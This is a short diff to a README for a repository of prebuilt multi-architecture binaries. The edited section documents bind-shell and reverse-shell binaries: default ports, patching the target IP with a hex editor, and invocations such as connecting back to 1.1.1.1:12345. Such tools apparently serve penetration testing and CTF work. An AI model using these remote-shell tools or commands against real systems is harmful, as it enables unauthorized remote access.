leommxj/prebuilt-multiarch-bin/README.md

 ## Bind/Reverse Shell binary

-run the bind shell without arguments like `./bind_shell` will listening on the port 3343 and `./bind_shell 6666` will listen on 6666. run the reverse shell binary will connect to 127.0.0.1:3343 , use a hex editor the change cstring cotains the ip/port.
+* run the bind shell without arguments like `./bind_shell` will listening on the port 3343 and `./bind_shell 6666` will listen on 6666.
+* run the reverse shell binary without arguments will connect to 127.0.0.1:3343 , one could use a hex editor the change cstring cotains the ip/port. or `./reverse_shell 1.1.1.1 12345` will connect to 1.1.1.1:12345; `./reverse_shell 1.1.1.1` will connect to 1.1.1.1:3343

 ## gdb (*Important*)